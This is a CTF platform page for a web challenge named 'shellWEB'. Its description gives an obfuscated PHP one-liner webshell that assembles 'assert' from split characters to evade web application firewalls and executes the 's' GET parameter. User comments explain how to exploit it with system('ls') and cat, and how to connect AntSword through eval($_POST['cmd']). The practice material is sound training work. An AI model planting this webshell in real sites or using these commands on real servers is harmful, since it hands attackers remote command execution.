shellWEB 未解决

分数: 25 金币: 3
题目作者: harry
一  血: dotast
一血奖励: 1金币
解  决: 6895
提  示:
描  述:
送给大家一个过狗一句话 $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s'])
评论
Cra2yNoob 5天前

为什么拿了flag,重新启动场景还要金币呀,我还想再试试有没有别的手法呢~

回复 0

banfang 1月前

点击场景,然后将描述发给豆包

回复 0

秋天在哪 1月前

为什么我的剑蚁连接超时?

回复 0

byhuang 2月前

flag{***}

回复 0

ubudj 3月前

分析代码,得到/?s=system(),用ls查看目录,找到文件。因为system函数能执行任何shell命令

回复 0

一个姓⎝李⎠的师傅~ 3月前

我的扩展里也解释了下,为何蚁剑能连接,大家可以看看,有不足的还希望互相探讨

回复 2

一个姓⎝李⎠的师傅~ 3月前

自己的解题思路:https://www.yuque.com/u21437924/ap9vtm/gqkc3dcfmfpe5p85?singleDoc#hjui5

回复 4

wywsssf 3月前

AI分析代码,参数格式为?s=system(''),先用ls目录,再用cat读取txt文件

回复 0

Bruce20231767 3月前

这道题两个方法,一个是用蚁剑连接,url/?s=eval($_POST['cmd'])。另一个是参数s接可执行命令(根据提示)system("ls"),获取网站目录下内容,发现有一个flag相关的txt文件,可以再使用system("cat {...}txt")命令,或者直接url/{...}.txt来获取内容

回复 0

2686213396 4月前

首先,这个描述给出提示,poc按#进行分割化为数组由poc2承接,而根据php语言的变量函数特性,最后一个式子会转为assert($_GET['s']),所以目标就是对s的值进行操作,进而获取服务器上隐藏的数据。选用system函数进行ls系统命令,读取服务器上可能存在的flag文件,再通过cat进行获取,得到最终的flag

回复 2

WriteUp

image
harry

3 金币

评分(10)

解题动态

bhcxzhdsa 攻破了该题 10小时前
19913788206 攻破了该题 11小时前
TTTTTTTT 攻破了该题 16小时前
xgz0506 攻破了该题 1天前
M1nh0n 攻破了该题 1天前
3564963108 攻破了该题 1天前
bfsyrgz 攻破了该题 1天前
18071867995 攻破了该题 1天前
想好思路再支付 攻破了该题 1天前
myhajimi 攻破了该题 2天前
15856786402 攻破了该题 2天前
17312257750 攻破了该题 2天前
奔跑的开开 攻破了该题 2天前
你不懂的吧 攻破了该题 2天前
jaykd 攻破了该题 2天前
wyjzzzz 攻破了该题 2天前
14791323936 攻破了该题 2天前
P19777 攻破了该题 3天前
Brightt 攻破了该题 3天前
yzzzzzzzz 攻破了该题 3天前
问题反馈